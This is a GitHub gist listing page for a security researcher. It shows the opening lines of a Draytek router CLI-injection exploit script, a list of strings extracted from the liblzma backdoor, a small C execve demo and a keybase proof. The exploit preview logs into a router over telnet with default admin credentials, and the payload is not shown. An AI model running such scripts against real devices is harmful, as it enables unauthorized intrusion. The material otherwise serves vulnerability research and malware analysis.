I hereby claim:
- I am q3k on github.
- I am q3k (https://keybase.io/q3k) on keybase.
- I have a public key whose fingerprint is 63DF E737 F078 657C C8A5 1C00 C29A DD73 B356 3D82
To claim this, I am signing this object:
q3k
/ draytek-sploit.py
Created
October 8, 2024 11:47
Draytek CLI injection (probably not CVE-2024-41585?)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pwn | |
| r = pwn.remote('192.168.1.1', 23) | |
| r.recvuntil('Username: ') | |
| r.sendline('admin') | |
| r.recvuntil('Password: ') | |
| r.sendline('admin') | |
| r.recvuntil('vigor> ') | |
| r.sendline('en') |
q3k
/ hashes.txt
Last active
November 11, 2024 17:38
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0810 b' from ' | |
| 0678 b' ssh2' | |
| 00d8 b'%.48s:%.48s():%d (pid=%ld)\x00' | |
| 0708 b'%s' | |
| 0108 b'/usr/sbin/sshd\x00' | |
| 0870 b'Accepted password for ' | |
| 01a0 b'Accepted publickey for ' | |
| 0c40 b'BN_bin2bn\x00' | |
| 06d0 b'BN_bn2bin\x00' | |
| 0958 b'BN_dup\x00' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| const char *buf = "hello from linux\n"; | |
| char * const argv[] = { | |
| "/bin/sh", | |
| "-c", | |
| "echo 'hello from execve'", | |
| NULL, | |
| }; |
q3k
/ keybase.md
Created
July 9, 2019 13:43